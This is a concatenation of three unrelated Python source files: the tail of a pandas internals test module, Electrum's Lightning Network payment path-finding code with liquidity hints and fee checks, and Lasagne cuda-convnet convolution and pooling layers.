assert_as_array_equals(slice(3, 0, -1), [3, 2, 1])
if not PY361:
assert_as_array_equals(slice(3, None, -1), [3, 2, 1, 0])
assert_as_array_equals(slice(31, None, -10), [31, 21, 11, 1])
def test_blockplacement_add(self):
bpl = BlockPlacement(slice(0, 5))
assert bpl.add(1).as_slice == slice(1, 6, 1)
assert bpl.add(np.arange(5)).as_slice == slice(0, 10, 2)
assert list(bpl.add(np.arange(5, 0, -1))) == [5, 5, 5, 5, 5]
def test_blockplacement_add_int(self):
def assert_add_equals(val, inc, result):
assert list(BlockPlacement(val).add(inc)) == result
assert_add_equals(slice(0, 0), 0, [])
assert_add_equals(slice(1, 4), 0, [1, 2, 3])
assert_add_equals(slice(3, 0, -1), 0, [3, 2, 1])
assert_add_equals([1, 2, 4], 0, [1, 2, 4])
assert_add_equals(slice(0, 0), 10, [])
assert_add_equals(slice(1, 4), 10, [11, 12, 13])
assert_add_equals(slice(3, 0, -1), 10, [13, 12, 11])
assert_add_equals([1, 2, 4], 10, [11, 12, 14])
assert_add_equals(slice(0, 0), -1, [])
assert_add_equals(slice(1, 4), -1, [0, 1, 2])
assert_add_equals([1, 2, 4], -1, [0, 1, 3])
with pytest.raises(ValueError):
BlockPlacement(slice(1, 4)).add(-10)
with pytest.raises(ValueError):
BlockPlacement([1, 2, 4]).add(-10)
if not PY361:
assert_add_equals(slice(3, 0, -1), -1, [2, 1, 0])
assert_add_equals(slice(2, None, -1), 0, [2, 1, 0])
assert_add_equals(slice(2, None, -1), 10, [12, 11, 10])
with pytest.raises(ValueError):
BlockPlacement(slice(2, None, -1)).add(-1)
class DummyElement(object):
def __init__(self, value, dtype):
self.value = value
self.dtype = np.dtype(dtype)
def __array__(self):
return np.array(self.value, dtype=self.dtype)
def __str__(self):
return "DummyElement({}, {})".format(self.value, self.dtype)
def __repr__(self):
return str(self)
def astype(self, dtype, copy=False):
self.dtype = dtype
return self
def view(self, dtype):
return type(self)(self.value.view(dtype), dtype)
def any(self, axis=None):
return bool(self.value)
class TestCanHoldElement(object):
@pytest.mark.parametrize('value, dtype', [
(1, 'i8'),
(1.0, 'f8'),
(1j, 'complex128'),
(True, 'bool'),
(np.timedelta64(20, 'ns'), '<m8[ns]'),
(np.datetime64(20, 'ns'), '<M8[ns]'),
])
@pytest.mark.parametrize('op', [
operator.add,
operator.sub,
operator.mul,
operator.truediv,
operator.mod,
operator.pow,
], ids=lambda x: x.__name__)
def test_binop_other(self, op, value, dtype):
skip = {(operator.add, 'bool'),
(operator.sub, 'bool'),
(operator.mul, 'bool'),
(operator.truediv, 'bool'),
(operator.mod, 'i8'),
(operator.mod, 'complex128'),
(operator.mod, '<M8[ns]'),
(operator.mod, '<m8[ns]'),
(operator.pow, 'bool')}
if (op, dtype) in skip:
pytest.skip("Invalid combination {},{}".format(op, dtype))
e = DummyElement(value, dtype)
s = pd.DataFrame({"A": [e.value, e.value]}, dtype=e.dtype)
result = op(s, e).dtypes
expected = op(s, value).dtypes
assert_series_equal(result, expected)
|
|
# -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
from collections import defaultdict
from typing import Sequence, Tuple, Optional, Dict, TYPE_CHECKING, Set
import time
from threading import RLock
import attr
from math import inf
from .util import profiler, with_lock, bh2u
from .logging import Logger
from .lnutil import (NUM_MAX_EDGES_IN_PAYMENT_PATH, ShortChannelID, LnFeatures,
NBLOCK_CLTV_EXPIRY_TOO_FAR_INTO_FUTURE)
from .channel_db import ChannelDB, Policy, NodeInfo
if TYPE_CHECKING:
from .lnchannel import Channel
DEFAULT_PENALTY_BASE_MSAT = 500 # how much base fee we apply for unknown sending capability of a channel
DEFAULT_PENALTY_PROPORTIONAL_MILLIONTH = 100 # how much relative fee we apply for unknown sending capability of a channel
BLACKLIST_DURATION = 3600 # how long (in seconds) a channel remains blacklisted
HINT_DURATION = 3600 # how long (in seconds) a liquidity hint remains valid
class NoChannelPolicy(Exception):
def __init__(self, short_channel_id: bytes):
short_channel_id = ShortChannelID.normalize(short_channel_id)
super().__init__(f'cannot find channel policy for short_channel_id: {short_channel_id}')
class LNPathInconsistent(Exception): pass
def fee_for_edge_msat(forwarded_amount_msat: int, fee_base_msat: int, fee_proportional_millionths: int) -> int:
return fee_base_msat \
+ (forwarded_amount_msat * fee_proportional_millionths // 1_000_000)
@attr.s(slots=True)
class PathEdge:
start_node = attr.ib(type=bytes, kw_only=True, repr=lambda val: val.hex())
end_node = attr.ib(type=bytes, kw_only=True, repr=lambda val: val.hex())
short_channel_id = attr.ib(type=ShortChannelID, kw_only=True, repr=lambda val: str(val))
@property
def node_id(self) -> bytes:
# legacy compat # TODO rm
return self.end_node
@attr.s
class RouteEdge(PathEdge):
fee_base_msat = attr.ib(type=int, kw_only=True)
fee_proportional_millionths = attr.ib(type=int, kw_only=True)
cltv_expiry_delta = attr.ib(type=int, kw_only=True)
node_features = attr.ib(type=int, kw_only=True, repr=lambda val: str(int(val))) # note: for end node!
def fee_for_edge(self, amount_msat: int) -> int:
return fee_for_edge_msat(forwarded_amount_msat=amount_msat,
fee_base_msat=self.fee_base_msat,
fee_proportional_millionths=self.fee_proportional_millionths)
@classmethod
def from_channel_policy(
cls,
*,
channel_policy: 'Policy',
short_channel_id: bytes,
start_node: bytes,
end_node: bytes,
node_info: Optional[NodeInfo], # for end_node
) -> 'RouteEdge':
assert isinstance(short_channel_id, bytes)
assert type(start_node) is bytes
assert type(end_node) is bytes
return RouteEdge(
start_node=start_node,
end_node=end_node,
short_channel_id=ShortChannelID.normalize(short_channel_id),
fee_base_msat=channel_policy.fee_base_msat,
fee_proportional_millionths=channel_policy.fee_proportional_millionths,
cltv_expiry_delta=channel_policy.cltv_expiry_delta,
node_features=node_info.features if node_info else 0)
def is_sane_to_use(self, amount_msat: int) -> bool:
# TODO revise ad-hoc heuristics
# cltv cannot be more than 2 weeks
if self.cltv_expiry_delta > 14 * 576:
return False
total_fee = self.fee_for_edge(amount_msat)
if not is_fee_sane(total_fee, payment_amount_msat=amount_msat):
return False
return True
def has_feature_varonion(self) -> bool:
features = LnFeatures(self.node_features)
return features.supports(LnFeatures.VAR_ONION_OPT)
def is_trampoline(self) -> bool:
return False
@attr.s
class TrampolineEdge(RouteEdge):
invoice_routing_info = attr.ib(type=bytes, default=None)
invoice_features = attr.ib(type=int, default=None)
# this is re-defined from parent just to specify a default value:
short_channel_id = attr.ib(default=ShortChannelID(8), repr=lambda val: str(val))
def is_trampoline(self):
return True
LNPaymentPath = Sequence[PathEdge]
LNPaymentRoute = Sequence[RouteEdge]
def is_route_sane_to_use(route: LNPaymentRoute, invoice_amount_msat: int, min_final_cltv_expiry: int) -> bool:
"""Run some sanity checks on the whole route, before attempting to use it.
called when we are paying; so e.g. lower cltv is better
"""
if len(route) > NUM_MAX_EDGES_IN_PAYMENT_PATH:
return False
amt = invoice_amount_msat
cltv = min_final_cltv_expiry
for route_edge in reversed(route[1:]):
if not route_edge.is_sane_to_use(amt): return False
amt += route_edge.fee_for_edge(amt)
cltv += route_edge.cltv_expiry_delta
total_fee = amt - invoice_amount_msat
# TODO revise ad-hoc heuristics
if cltv > NBLOCK_CLTV_EXPIRY_TOO_FAR_INTO_FUTURE:
return False
if not is_fee_sane(total_fee, payment_amount_msat=invoice_amount_msat):
return False
return True
def is_fee_sane(fee_msat: int, *, payment_amount_msat: int) -> bool:
# fees <= 5 sat are fine
if fee_msat <= 5_000:
return True
# fees <= 1 % of payment are fine
if 100 * fee_msat <= payment_amount_msat:
return True
return False
class LiquidityHint:
"""Encodes the amounts that can and cannot be sent over the direction of a
channel and whether the channel is blacklisted.
A LiquidityHint is the value of a dict, which is keyed to node ids and the
channel.
"""
def __init__(self):
# use "can_send_forward + can_send_backward < cannot_send_forward + cannot_send_backward" as a sanity check?
self._can_send_forward = None
self._cannot_send_forward = None
self._can_send_backward = None
self._cannot_send_backward = None
self.blacklist_timestamp = 0
self.hint_timestamp = 0
self._inflight_htlcs_forward = 0
self._inflight_htlcs_backward = 0
def is_hint_invalid(self) -> bool:
now = int(time.time())
return now - self.hint_timestamp > HINT_DURATION
@property
def can_send_forward(self):
return None if self.is_hint_invalid() else self._can_send_forward
@can_send_forward.setter
def can_send_forward(self, amount):
# we don't want to record less significant info
# (sendable amount is lower than known sendable amount):
if self._can_send_forward and self._can_send_forward > amount:
return
self._can_send_forward = amount
# we make a sanity check that sendable amount is lower than not sendable amount
if self._cannot_send_forward and self._can_send_forward > self._cannot_send_forward:
self._cannot_send_forward = None
@property
def can_send_backward(self):
return None if self.is_hint_invalid() else self._can_send_backward
@can_send_backward.setter
def can_send_backward(self, amount):
if self._can_send_backward and self._can_send_backward > amount:
return
self._can_send_backward = amount
if self._cannot_send_backward and self._can_send_backward > self._cannot_send_backward:
self._cannot_send_backward = None
@property
def cannot_send_forward(self):
return None if self.is_hint_invalid() else self._cannot_send_forward
@cannot_send_forward.setter
def cannot_send_forward(self, amount):
# we don't want to record less significant info
# (not sendable amount is higher than known not sendable amount):
if self._cannot_send_forward and self._cannot_send_forward < amount:
return
self._cannot_send_forward = amount
if self._can_send_forward and self._can_send_forward > self._cannot_send_forward:
self._can_send_forward = None
# if we can't send over the channel, we should be able to send in the
# reverse direction
self.can_send_backward = amount
@property
def cannot_send_backward(self):
return None if self.is_hint_invalid() else self._cannot_send_backward
@cannot_send_backward.setter
def cannot_send_backward(self, amount):
if self._cannot_send_backward and self._cannot_send_backward < amount:
return
self._cannot_send_backward = amount
if self._can_send_backward and self._can_send_backward > self._cannot_send_backward:
self._can_send_backward = None
self.can_send_forward = amount
def can_send(self, is_forward_direction: bool):
# make info invalid after some time?
if is_forward_direction:
return self.can_send_forward
else:
return self.can_send_backward
def cannot_send(self, is_forward_direction: bool):
# make info invalid after some time?
if is_forward_direction:
return self.cannot_send_forward
else:
return self.cannot_send_backward
def update_can_send(self, is_forward_direction: bool, amount: int):
self.hint_timestamp = int(time.time())
if is_forward_direction:
self.can_send_forward = amount
else:
self.can_send_backward = amount
def update_cannot_send(self, is_forward_direction: bool, amount: int):
self.hint_timestamp = int(time.time())
if is_forward_direction:
self.cannot_send_forward = amount
else:
self.cannot_send_backward = amount
def num_inflight_htlcs(self, is_forward_direction: bool) -> int:
if is_forward_direction:
return self._inflight_htlcs_forward
else:
return self._inflight_htlcs_backward
def add_htlc(self, is_forward_direction: bool):
if is_forward_direction:
self._inflight_htlcs_forward += 1
else:
self._inflight_htlcs_backward += 1
def remove_htlc(self, is_forward_direction: bool):
if is_forward_direction:
self._inflight_htlcs_forward = max(0, self._inflight_htlcs_forward - 1)
else:
self._inflight_htlcs_backward = max(0, self._inflight_htlcs_forward - 1)
def __repr__(self):
is_blacklisted = False if not self.blacklist_timestamp else int(time.time()) - self.blacklist_timestamp < BLACKLIST_DURATION
return f"forward: can send: {self._can_send_forward} msat, cannot send: {self._cannot_send_forward} msat, htlcs: {self._inflight_htlcs_forward}\n" \
f"backward: can send: {self._can_send_backward} msat, cannot send: {self._cannot_send_backward} msat, htlcs: {self._inflight_htlcs_backward}\n" \
f"blacklisted: {is_blacklisted}"
class LiquidityHintMgr:
"""Implements liquidity hints for channels in the graph.
This class can be used to update liquidity information about channels in the
graph. Implements a penalty function for edge weighting in the pathfinding
algorithm that favors channels which can route payments and penalizes
channels that cannot.
"""
# TODO: hints based on node pairs only (shadow channels, non-strict forwarding)?
def __init__(self):
self.lock = RLock()
self._liquidity_hints: Dict[ShortChannelID, LiquidityHint] = {}
@with_lock
def get_hint(self, channel_id: ShortChannelID) -> LiquidityHint:
hint = self._liquidity_hints.get(channel_id)
if not hint:
hint = LiquidityHint()
self._liquidity_hints[channel_id] = hint
return hint
@with_lock
def update_can_send(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID, amount: int):
hint = self.get_hint(channel_id)
hint.update_can_send(node_from < node_to, amount)
@with_lock
def update_cannot_send(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID, amount: int):
hint = self.get_hint(channel_id)
hint.update_cannot_send(node_from < node_to, amount)
@with_lock
def add_htlc(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID):
hint = self.get_hint(channel_id)
hint.add_htlc(node_from < node_to)
@with_lock
def remove_htlc(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID):
hint = self.get_hint(channel_id)
hint.remove_htlc(node_from < node_to)
def penalty(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID, amount: int) -> float:
"""Gives a penalty when sending from node1 to node2 over channel_id with an
amount in units of millisatoshi.
The penalty depends on the can_send and cannot_send values that was
possibly recorded in previous payment attempts.
A channel that can send an amount is assigned a penalty of zero, a
channel that cannot send an amount is assigned an infinite penalty.
If the sending amount lies between can_send and cannot_send, there's
uncertainty and we give a default penalty. The default penalty
serves the function of giving a positive offset (the Dijkstra
algorithm doesn't work with negative weights), from which we can discount
from. There is a competition between low-fee channels and channels where
we know with some certainty that they can support a payment. The penalty
ultimately boils down to: how much more fees do we want to pay for
certainty of payment success? This can be tuned via DEFAULT_PENALTY_BASE_MSAT
and DEFAULT_PENALTY_PROPORTIONAL_MILLIONTH. A base _and_ relative penalty
was chosen such that the penalty will be able to compete with the regular
base and relative fees.
"""
# we only evaluate hints here, so use dict get (to not create many hints with self.get_hint)
hint = self._liquidity_hints.get(channel_id)
if not hint:
can_send, cannot_send, num_inflight_htlcs = None, None, 0
else:
can_send = hint.can_send(node_from < node_to)
cannot_send = hint.cannot_send(node_from < node_to)
num_inflight_htlcs = hint.num_inflight_htlcs(node_from < node_to)
if cannot_send is not None and amount >= cannot_send:
return inf
if can_send is not None and amount <= can_send:
return 0
success_fee = fee_for_edge_msat(amount, DEFAULT_PENALTY_BASE_MSAT, DEFAULT_PENALTY_PROPORTIONAL_MILLIONTH)
inflight_htlc_fee = num_inflight_htlcs * success_fee
return success_fee + inflight_htlc_fee
@with_lock
def add_to_blacklist(self, channel_id: ShortChannelID):
hint = self.get_hint(channel_id)
now = int(time.time())
hint.blacklist_timestamp = now
@with_lock
def get_blacklist(self) -> Set[ShortChannelID]:
now = int(time.time())
return set(k for k, v in self._liquidity_hints.items() if now - v.blacklist_timestamp < BLACKLIST_DURATION)
@with_lock
def clear_blacklist(self):
for k, v in self._liquidity_hints.items():
v.blacklist_timestamp = 0
@with_lock
def reset_liquidity_hints(self):
for k, v in self._liquidity_hints.items():
v.hint_timestamp = 0
def __repr__(self):
string = "liquidity hints:\n"
if self._liquidity_hints:
for k, v in self._liquidity_hints.items():
string += f"{k}: {v}\n"
return string
class LNPathFinder(Logger):
def __init__(self, channel_db: ChannelDB):
Logger.__init__(self)
self.channel_db = channel_db
self.liquidity_hints = LiquidityHintMgr()
def update_liquidity_hints(
self,
route: LNPaymentRoute,
amount_msat: int,
failing_channel: ShortChannelID=None
):
# go through the route and record successes until the failing channel is reached,
# for the failing channel, add a cannot_send liquidity hint
# note: actual routable amounts are slightly different than reported here
# as fees would need to be added
for r in route:
if r.short_channel_id != failing_channel:
self.logger.info(f"report {r.short_channel_id} to be able to forward {amount_msat} msat")
self.liquidity_hints.update_can_send(r.start_node, r.end_node, r.short_channel_id, amount_msat)
else:
self.logger.info(f"report {r.short_channel_id} to be unable to forward {amount_msat} msat")
self.liquidity_hints.update_cannot_send(r.start_node, r.end_node, r.short_channel_id, amount_msat)
break
def update_inflight_htlcs(self, route: LNPaymentRoute, add_htlcs: bool):
self.logger.info(f"{'Adding' if add_htlcs else 'Removing'} inflight htlcs to graph (liquidity hints).")
for r in route:
if add_htlcs:
self.liquidity_hints.add_htlc(r.start_node, r.end_node, r.short_channel_id)
else:
self.liquidity_hints.remove_htlc(r.start_node, r.end_node, r.short_channel_id)
def _edge_cost(
self,
*,
short_channel_id: bytes,
start_node: bytes,
end_node: bytes,
payment_amt_msat: int,
ignore_costs=False,
is_mine=False,
my_channels: Dict[ShortChannelID, 'Channel'] = None,
private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Tuple[float, int]:
"""Heuristic cost (distance metric) of going through a channel.
Returns (heuristic_cost, fee_for_edge_msat).
"""
if private_route_edges is None:
private_route_edges = {}
channel_info = self.channel_db.get_channel_info(
short_channel_id, my_channels=my_channels, private_route_edges=private_route_edges)
if channel_info is None:
return float('inf'), 0
channel_policy = self.channel_db.get_policy_for_node(
short_channel_id, start_node, my_channels=my_channels, private_route_edges=private_route_edges)
if channel_policy is None:
return float('inf'), 0
# channels that did not publish both policies often return temporary channel failure
channel_policy_backwards = self.channel_db.get_policy_for_node(
short_channel_id, end_node, my_channels=my_channels, private_route_edges=private_route_edges)
if (channel_policy_backwards is None
and not is_mine
and short_channel_id not in private_route_edges):
return float('inf'), 0
if channel_policy.is_disabled():
return float('inf'), 0
if payment_amt_msat < channel_policy.htlc_minimum_msat:
return float('inf'), 0 # payment amount too little
if channel_info.capacity_sat is not None and \
payment_amt_msat // 1000 > channel_info.capacity_sat:
return float('inf'), 0 # payment amount too large
if channel_policy.htlc_maximum_msat is not None and \
payment_amt_msat > channel_policy.htlc_maximum_msat:
return float('inf'), 0 # payment amount too large
route_edge = private_route_edges.get(short_channel_id, None)
if route_edge is None:
node_info = self.channel_db.get_node_info_for_node_id(node_id=end_node)
route_edge = RouteEdge.from_channel_policy(
channel_policy=channel_policy,
short_channel_id=short_channel_id,
start_node=start_node,
end_node=end_node,
node_info=node_info)
if not route_edge.is_sane_to_use(payment_amt_msat):
return float('inf'), 0 # thanks but no thanks
# Distance metric notes: # TODO constants are ad-hoc
# ( somewhat based on https://github.com/lightningnetwork/lnd/pull/1358 )
# - Edges have a base cost. (more edges -> less likely none will fail)
# - The larger the payment amount, and the longer the CLTV,
# the more irritating it is if the HTLC gets stuck.
# - Paying lower fees is better. :)
if ignore_costs:
return DEFAULT_PENALTY_BASE_MSAT, 0
fee_msat = route_edge.fee_for_edge(payment_amt_msat)
cltv_cost = route_edge.cltv_expiry_delta * payment_amt_msat * 15 / 1_000_000_000
# the liquidty penalty takes care we favor edges that should be able to forward
# the payment and penalize edges that cannot
liquidity_penalty = self.liquidity_hints.penalty(start_node, end_node, short_channel_id, payment_amt_msat)
overall_cost = fee_msat + cltv_cost + liquidity_penalty
return overall_cost, fee_msat
def get_shortest_path_hops(
self,
*,
nodeA: bytes,
nodeB: bytes,
invoice_amount_msat: int,
my_sending_channels: Dict[ShortChannelID, 'Channel'] = None,
private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Dict[bytes, PathEdge]:
# note: we don't lock self.channel_db, so while the path finding runs,
# the underlying graph could potentially change... (not good but maybe ~OK?)
# run Dijkstra
# The search is run in the REVERSE direction, from nodeB to nodeA,
# to properly calculate compound routing fees.
blacklist = self.liquidity_hints.get_blacklist()
distance_from_start = defaultdict(lambda: float('inf'))
distance_from_start[nodeB] = 0
previous_hops = {} # type: Dict[bytes, PathEdge]
nodes_to_explore = queue.PriorityQueue()
nodes_to_explore.put((0, invoice_amount_msat, nodeB)) # order of fields (in tuple) matters!
# main loop of search
while nodes_to_explore.qsize() > 0:
dist_to_edge_endnode, amount_msat, edge_endnode = nodes_to_explore.get()
if edge_endnode == nodeA and previous_hops: # previous_hops check for circular paths
self.logger.info("found a path")
break
if dist_to_edge_endnode != distance_from_start[edge_endnode]:
# queue.PriorityQueue does not implement decrease_priority,
# so instead of decreasing priorities, we add items again into the queue.
# so there are duplicates in the queue, that we discard now:
continue
if nodeA == nodeB: # we want circular paths
if not previous_hops: # in the first node exploration step, we only take receiving channels
channels_for_endnode = self.channel_db.get_channels_for_node(
edge_endnode, my_channels={}, private_route_edges=private_route_edges)
else: # in the next steps, we only take sending channels
channels_for_endnode = self.channel_db.get_channels_for_node(
edge_endnode, my_channels=my_sending_channels, private_route_edges={})
else:
channels_for_endnode = self.channel_db.get_channels_for_node(
edge_endnode, my_channels=my_sending_channels, private_route_edges=private_route_edges)
for edge_channel_id in channels_for_endnode:
assert isinstance(edge_channel_id, bytes)
if blacklist and edge_channel_id in blacklist:
continue
channel_info = self.channel_db.get_channel_info(
edge_channel_id, my_channels=my_sending_channels, private_route_edges=private_route_edges)
if channel_info is None:
continue
edge_startnode = channel_info.node2_id if channel_info.node1_id == edge_endnode else channel_info.node1_id
is_mine = edge_channel_id in my_sending_channels
if is_mine:
if edge_startnode == nodeA: # payment outgoing, on our channel
if not my_sending_channels[edge_channel_id].can_pay(amount_msat, check_frozen=True):
continue
edge_cost, fee_for_edge_msat = self._edge_cost(
short_channel_id=edge_channel_id,
start_node=edge_startnode,
end_node=edge_endnode,
payment_amt_msat=amount_msat,
ignore_costs=(edge_startnode == nodeA),
is_mine=is_mine,
my_channels=my_sending_channels,
private_route_edges=private_route_edges)
alt_dist_to_neighbour = distance_from_start[edge_endnode] + edge_cost
if alt_dist_to_neighbour < distance_from_start[edge_startnode]:
distance_from_start[edge_startnode] = alt_dist_to_neighbour
previous_hops[edge_startnode] = PathEdge(
start_node=edge_startnode,
end_node=edge_endnode,
short_channel_id=ShortChannelID(edge_channel_id))
amount_to_forward_msat = amount_msat + fee_for_edge_msat
nodes_to_explore.put((alt_dist_to_neighbour, amount_to_forward_msat, edge_startnode))
# for circular paths, we already explored the end node, but this
# is also our start node, so set it to unexplored
if edge_endnode == nodeB and nodeA == nodeB:
distance_from_start[edge_endnode] = float('inf')
return previous_hops
@profiler
def find_path_for_payment(
self,
*,
nodeA: bytes,
nodeB: bytes,
invoice_amount_msat: int,
my_sending_channels: Dict[ShortChannelID, 'Channel'] = None,
private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Optional[LNPaymentPath]:
"""Return a path from nodeA to nodeB."""
assert type(nodeA) is bytes
assert type(nodeB) is bytes
assert type(invoice_amount_msat) is int
if my_sending_channels is None:
my_sending_channels = {}
previous_hops = self.get_shortest_path_hops(
nodeA=nodeA,
nodeB=nodeB,
invoice_amount_msat=invoice_amount_msat,
my_sending_channels=my_sending_channels,
private_route_edges=private_route_edges)
if nodeA not in previous_hops:
return None # no path found
# backtrack from search_end (nodeA) to search_start (nodeB)
# FIXME paths cannot be longer than 20 edges (onion packet)...
edge_startnode = nodeA
path = []
while edge_startnode != nodeB or not path: # second condition for circular paths
edge = previous_hops[edge_startnode]
path += [edge]
edge_startnode = edge.node_id
return path
def create_route_from_path(
self,
path: Optional[LNPaymentPath],
*,
my_channels: Dict[ShortChannelID, 'Channel'] = None,
private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> LNPaymentRoute:
if path is None:
raise Exception('cannot create route from None path')
if private_route_edges is None:
private_route_edges = {}
route = []
prev_end_node = path[0].start_node
for path_edge in path:
short_channel_id = path_edge.short_channel_id
_endnodes = self.channel_db.get_endnodes_for_chan(short_channel_id, my_channels=my_channels)
if _endnodes and sorted(_endnodes) != sorted([path_edge.start_node, path_edge.end_node]):
raise LNPathInconsistent("endpoints of edge inconsistent with short_channel_id")
if path_edge.start_node != prev_end_node:
raise LNPathInconsistent("edges do not chain together")
route_edge = private_route_edges.get(short_channel_id, None)
if route_edge is None:
channel_policy = self.channel_db.get_policy_for_node(
short_channel_id=short_channel_id,
node_id=path_edge.start_node,
my_channels=my_channels)
if channel_policy is None:
raise NoChannelPolicy(short_channel_id)
node_info = self.channel_db.get_node_info_for_node_id(node_id=path_edge.end_node)
route_edge = RouteEdge.from_channel_policy(
channel_policy=channel_policy,
short_channel_id=short_channel_id,
start_node=path_edge.start_node,
end_node=path_edge.end_node,
node_info=node_info)
route.append(route_edge)
prev_end_node = path_edge.end_node
return route
def find_route(
self,
*,
nodeA: bytes,
nodeB: bytes,
invoice_amount_msat: int,
path = None,
my_sending_channels: Dict[ShortChannelID, 'Channel'] = None,
private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Optional[LNPaymentRoute]:
route = None
if not path:
path = self.find_path_for_payment(
nodeA=nodeA,
nodeB=nodeB,
invoice_amount_msat=invoice_amount_msat,
my_sending_channels=my_sending_channels,
private_route_edges=private_route_edges)
if path:
route = self.create_route_from_path(
path, my_channels=my_sending_channels, private_route_edges=private_route_edges)
return route
|
|
import numpy as np
import theano
import theano.tensor as T
from .. import init
from .. import nonlinearities
from . import base
from theano.sandbox.cuda.basic_ops import gpu_contiguous
# TODO: make sure to document the limitations and 'best practices' (i.e. minibatch size % 128 == 0)
# TODO: see if the 'dimshuffle' logic can be put in the base class instead.
# base class for all layers that use ops from pylearn2.sandbox.cuda_convnet
class CCLayer(base.Layer):
pass
class Conv2DCCLayer(CCLayer):
def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,
W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,
dimshuffle=True, flip_filters=False, partial_sum=1):
from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
super(Conv2DCCLayer, self).__init__(input_layer)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
if filter_size[0] != filter_size[1]:
raise RuntimeError("Conv2DCCLayer only supports square filters, but filter_size=(%d, %d)" % filter_size)
if strides[0] != strides[1]:
raise RuntimeError("Conv2DCCLayer only supports square strides, but strides=(%d, %d)" % strides)
if num_filters % 16 != 0:
raise RuntimeError("Conv2DCCLayer requires num_filters to be a multiple of 16, but num_filters is %d" % num_filters)
self.num_filters = num_filters
self.filter_size = filter_size[0]
self.stride = strides[0]
self.untie_biases = untie_biases
self.dimshuffle = dimshuffle
self.flip_filters = flip_filters
self.partial_sum = partial_sum
if border_mode is not None and pad is not None:
raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
elif border_mode is None and pad is None:
# no option specified, default to valid mode
self.pad = 0
elif border_mode is not None:
if border_mode == 'valid':
self.pad = 0
elif border_mode == 'full':
self.pad = self.filter_size - 1
elif border_mode == 'same':
# only works for odd filter size, but the even filter size case is probably not worth supporting.
self.pad = (self.filter_size - 1) // 2
else:
raise RuntimeError("Unsupported border_mode for Conv2DCCLayer: %s" % border_mode)
else:
self.pad = pad
self.W = self.create_param(W, self.get_W_shape())
if self.untie_biases:
output_shape = self.get_output_shape()
if self.dimshuffle:
self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
else:
self.b = self.create_param(b, (num_filters, output_shape[1], output_shape[2]))
else:
self.b = self.create_param(b, (num_filters,))
self.filter_acts_op = FilterActs(stride=self.stride, partial_sum=self.partial_sum, pad=self.pad)
def get_W_shape(self):
if self.dimshuffle:
num_input_channels = self.input_layer.get_output_shape()[1]
return (self.num_filters, num_input_channels, self.filter_size, self.filter_size)
else:
num_input_channels = self.input_layer.get_output_shape()[0]
return (num_input_channels, self.filter_size, self.filter_size, self.num_filters)
def get_params(self):
return [self.W, self.b]
def get_bias_params(self):
return [self.b]
def get_output_shape_for(self, input_shape):
if self.dimshuffle:
batch_size = input_shape[0]
input_width, input_height = input_shape[2:4]
else:
batch_size = input_shape[3]
input_width, input_height = input_shape[1:3]
output_width = (input_width + 2*self.pad - self.filter_size) // self.stride + 1
output_height = (input_height + 2*self.pad - self.filter_size) // self.stride + 1
if self.dimshuffle:
return (batch_size, self.num_filters, output_width, output_height)
else:
return (self.num_filters, output_width, output_height, batch_size)
def get_output_for(self, input, *args, **kwargs):
if self.dimshuffle:
filters = self.W.dimshuffle(1, 2, 3, 0) # bc01 to c01b
input = input.dimshuffle(1, 2, 3, 0) # bc01 to c01b
else:
filters = self.W
if self.flip_filters:
filters = filters[:, ::-1, ::-1, :] # flip width, height
contiguous_filters = gpu_contiguous(filters)
contiguous_input = gpu_contiguous(input)
conved = self.filter_acts_op(contiguous_input, contiguous_filters)
if self.untie_biases:
biases = self.b.dimshuffle(0, 1, 2, 'x') # c01 to c01b
else:
biases = self.b.dimshuffle(0, 'x', 'x', 'x') # c to c01b
conved += biases
conved = self.nonlinearity(conved)
if self.dimshuffle:
return conved.dimshuffle(3, 0, 1, 2) # c01b to bc01
else:
return conved
class MaxPool2DCCLayer(CCLayer):
def __init__(self, input_layer, ds, ignore_border=False, strides=None, dimshuffle=True):
from pylearn2.sandbox.cuda_convnet.pool import MaxPool
super(MaxPool2DCCLayer, self).__init__(input_layer)
if ds[0] != ds[1]:
raise RuntimeError("MaxPool2DCCLayer only supports square pooling regions, but ds=(%d, %d)" % ds)
if strides is not None and strides[0] != strides[1]:
raise RuntimeError("MaxPool2DCCLayer only supports using the same stride in both directions, but strides=(%d, %d)" % strides)
# ignore_border argument is for compatibility with MaxPool2DLayer.
# it is not supported. Borders are never ignored.
if ignore_border != False:
raise RuntimeError("MaxPool2DCCLayer does not support ignore_border.")
self.ds = ds[0]
if strides is None:
self.stride = self.ds
else:
self.stride = strides[0]
self.dimshuffle = dimshuffle
